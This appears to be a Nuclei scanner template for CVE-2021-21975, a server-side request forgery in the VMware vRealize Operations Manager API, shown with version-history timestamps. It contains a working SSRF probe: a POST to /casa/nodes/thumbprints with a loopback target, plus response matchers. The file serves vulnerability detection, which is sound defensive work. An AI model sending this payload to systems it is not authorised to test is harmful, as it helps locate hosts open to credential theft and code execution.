nuclei-templates/http/cves/2021/CVE-2021-21975.yaml

47 lines
1.4 KiB
YAML
Raw Normal View History

2021-03-30 23:43:36 +00:00
id: CVE-2021-21975
info:
name: vRealize Operations Manager API - Server-Side Request Forgery
2021-03-30 23:43:36 +00:00
author: luci
severity: high
description: vRealize Operations Manager API is susceptible to server-side request forgery. A malicious actor with network access to the vRealize Operations Manager API can steal administrative credentials or trigger remote code execution using CVE-2021-21983.
reference:
- https://www.vmware.com/security/advisories/VMSA-2021-0004.html
- http://packetstormsecurity.com/files/162349/VMware-vRealize-Operations-Manager-Server-Side-Request-Forgery-Code-Execution.html
- https://nvd.nist.gov/vuln/detail/CVE-2021-21975
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2021-21975
cwe-id: CWE-918
2023-07-11 19:49:27 +00:00
epss-score: 0.97441
cpe: cpe:2.3:a:vmware:cloud_foundation:3.0:*:*:*:*:*:*:*
metadata:
max-request: 1
2023-07-11 19:49:27 +00:00
vendor: vmware
product: cloud_foundation
tags: kev,packetstorm,cve,cve2021,ssrf,vmware,vrealize
2021-03-30 23:43:36 +00:00
http:
2021-03-30 23:43:36 +00:00
- raw:
- |
POST /casa/nodes/thumbprints HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json;charset=UTF-8
2021-03-31 00:52:10 +00:00
["127.0.0.1:443/ui/"]
2021-03-30 23:43:36 +00:00
matchers-condition: and
matchers:
- type: word
2022-06-28 02:51:27 +00:00
part: body
2021-03-30 23:43:36 +00:00
words:
2021-03-31 17:15:42 +00:00
- 'vRealize Operations Manager'
- 'thumbprint'
- 'address'
condition: and
2022-06-28 02:51:27 +00:00
2021-03-30 23:43:36 +00:00
- type: status
status:
- 200